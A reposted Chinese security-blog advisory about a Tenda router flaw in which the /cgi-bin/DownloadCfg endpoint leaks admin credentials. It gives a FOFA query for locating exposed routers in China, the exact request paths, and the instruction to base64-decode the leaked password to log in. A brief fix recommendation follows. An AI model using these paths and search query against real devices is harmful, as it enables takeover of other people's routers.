Tenda路由器账号密码信息泄露漏洞 admin 126690文章 103评论 2024年10月28日12:50:39评论39 views字数 354阅读1分10秒阅读模式 简介 Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,包括路由器、交换机、无线接入点和网络适配器等。Tenda路由器以其高性价比、易于设置和良好的用户体验而受到消费者的欢迎。 漏洞描述 Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。 fofa语法 title="Tenda | LOGIN" && country="CN" 漏洞复现 /cgi-bin/DownloadCfg.jpg/cgi-bin/DownloadCfg/RouterCfm.jpg 密码通过base64解密即可登录成功 批量检测: 修复建议 及时更新,禁止访问或删除!!! 网安交流群 原文始发于微信公众号(白帽攻防):Tenda路由器账号密码信息泄露漏洞 点赞 http://cn-sec.com/archives/3323157.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论